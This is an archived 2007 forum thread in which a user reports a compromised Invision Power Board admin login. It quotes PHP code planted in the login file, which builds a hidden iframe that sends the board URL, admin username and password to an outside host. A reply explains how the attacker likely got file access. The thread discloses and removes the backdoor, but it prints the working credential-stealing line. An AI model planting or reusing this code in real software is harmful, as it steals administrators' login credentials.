jdtate78 Posted May 22, 2007 Share Posted May 22, 2007 Hello,I have a client, more a friend actually who has an IPB 2.2 install, anyway he contacted me as he couldnt get into his ACP, it just hung and did not redirect, he didnt have time to wait for support or anything so I took a look.Upon submitting admin log in details I found the browser attempting to connect to this site http://zybez.ath.cx particularly a php file called connector.php at this URL http://zybez.ath.cx/connector.php, when I looked at the source code I found the following:<script>window.stuats='';</script><div style="display:none"><iframe src="http://zybez.ath.cx/connector.php?site=http://site.com/ipbforum&user=administrator&pass=PASSWORDREMOVED\"></div> As you can see it look like this exploit is sending admin login details straight to the hackers website. After doing some more poking around in the IPB files i found the following code in sources/action_admin/login.php on line 226 $connector = '<script>window.stuats=\'\';</script><div style="display:none"><iframesrc="http://zybez.ath.cx/connector.php?site=' . htmlentities($this->ipsclass->vars['board_url']) . '&user=' . htmlentities($this->ipsclass->input['username']) . '&pass=' . htmlentities($this->ipsclass->input['password']) . '\"></div>';Im guessing this code isnt part of the original IPB files?Once the code wsa removed all was well.Bye Link to comment Share on other sites More sharing options...
bfarber Posted May 22, 2007 Share Posted May 22, 2007 Would mean the "hacker" had direct access to the file code - either via FTP, or by being hosted on the same server, and security settings being lax (open_basedir off, file chmod 777, etc.).This is not a support forum, however, I'm afraid. Your friend will need to submit a ticket for support. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.